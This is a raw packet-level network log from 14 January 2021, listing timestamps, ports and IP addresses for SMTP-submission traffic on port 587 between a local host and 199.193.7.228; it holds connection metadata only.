Jan 14, 2021 08:02:17.552999973 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.553738117 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.555072069 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.559289932 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.559658051 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.745964050 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.746226072 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.749815941 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.752876043 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.753312111 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.936425924 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.936898947 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.937329054 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:17.943502903 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.993356943 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:17.993833065 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.127619982 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.128160954 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.184035063 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.184631109 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.185115099 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.185249090 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.185421944 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.185592890 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.318351984 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.318392992 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.318531990 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.319544077 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.320477962 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.323755980 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.375315905 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.375349998 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.375461102 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.375617981 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.510588884 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.510612011 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.513901949 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.514229059 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.514607906 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.704770088 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.706861019 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.708076000 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.729948997 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.898354053 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.901617050 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.901973009 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:18.920278072 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:18.921737909 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.092196941 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.092885017 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.093323946 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.112050056 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.112095118 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.112112045 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.112229109 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.112277985 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.212054014 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.212301016 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.283567905 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.302578926 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.302614927 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.302865028 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.302957058 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.303102016 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.314549923 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.316159010 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.402615070 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.404743910 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.493271112 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.493329048 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.493346930 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.493360043 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.493489981 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.493541002 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.493881941 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.493905067 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.494041920 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.506429911 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.508188009 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.509989023 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.510191917 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.510400057 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.510539055 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.510695934 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.510835886 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.510984898 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.595022917 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.597804070 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.683845997 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.683877945 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.683962107 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.683980942 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.684081078 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.684146881 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.684309006 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.684325933 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.684392929 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.684431076 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.684462070 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.684551001 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.684639931 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.684680939 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.684689999 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.684743881 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.684753895 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.684905052 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.700275898 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.700309992 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.700422049 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.700504065 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.700579882 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.700635910 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.700838089 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.700875998 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.700898886 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.700917006 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.700942039 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.701023102 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.701050997 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.701097965 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.701206923 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.788191080 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.790843964 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.874422073 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.874449015 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.874535084 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.874789953 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.874805927 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.874869108 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.875062943 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.875350952 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.875475883 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.875507116 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.876171112 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.877429962 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.877501011 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.877530098 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.890810013 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.890834093 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.890986919 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.891004086 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.891019106 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.891072989 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.891088009 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.891103983 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.891141891 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.891177893 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.891208887 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.891246080 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.891293049 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.891347885 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:19.981117010 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:19.981234074 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.066451073 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.066484928 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.066493988 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.066591978 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.066651106 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.066761971 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.067080021 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.067289114 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.067555904 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.067570925 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.067646027 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.067706108 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.067711115 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.067817926 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.067883968 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.067897081 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.067926884 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.068048000 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.068243027 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.069026947 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.081273079 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.081331968 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.081345081 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.081449986 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.081532955 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.081600904 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.081618071 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.081684113 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.171478033 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.171582937 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.256830931 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.256866932 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.257138014 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.257183075 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.257266998 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.257313967 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.257365942 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.257440090 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.257719994 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.257738113 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.257869005 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.257873058 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.257930994 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.258007050 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.258121967 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.258122921 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.258200884 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.258217096 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.258280993 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.258310080 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.258374929 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.258514881 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.258661032 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.259246111 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.259268999 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.259289026 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.259371042 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.259397030 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.271790981 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.271819115 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.271833897 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.271846056 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.271857023 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.271928072 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.271955967 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.271992922 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.272027969 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.272044897 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.272119045 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.272353888 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.272578001 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.272805929 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.272908926 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.273051977 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.273211002 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.273349047 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.273492098 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.273648977 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.273881912 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.274111032 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.274252892 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.274413109 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.274586916 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.274730921 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.365101099 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.367961884 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.449908972 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.449935913 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.449951887 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.449966908 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.449985981 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450001955 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450007915 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.450016975 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450033903 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450050116 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450062990 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.450067043 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450083971 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450088024 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.450099945 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450119019 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450135946 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450150967 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.450362921 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.450583935 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.450759888 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.462289095 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.462312937 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.462328911 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.462343931 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.462362051 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.462447882 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.462528944 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.464021921 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.464988947 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465555906 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465871096 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465888977 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465903044 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465917110 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465930939 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465950012 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465965986 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465981960 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.465997934 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.466013908 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.466028929 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.466046095 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.482031107 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.558285952 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.558368921 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.611288071 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.640356064 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.640389919 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.640424013 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.640496969 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.640590906 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.640681982 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.640702963 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.640813112 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.640969038 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.640983105 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.641002893 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.641078949 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.641280890 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.641330004 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.641907930 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.741457939 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.741565943 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.748621941 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.748853922 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.833255053 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833283901 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833291054 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833301067 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833308935 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833323956 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833336115 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833345890 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833358049 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833369017 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833379984 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833405972 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833416939 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833427906 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.833439112 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.834435940 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.835076094 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.835335970 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.835536003 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:20.939060926 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:20.939193964 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.024755955 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.024779081 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.024789095 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.024946928 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.025027990 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.025048971 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.025113106 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.025279045 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.025362968 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.025377035 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.025454044 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.025463104 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.025477886 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.025543928 CET	49831	587	192.168.2.3	199.193.7.228
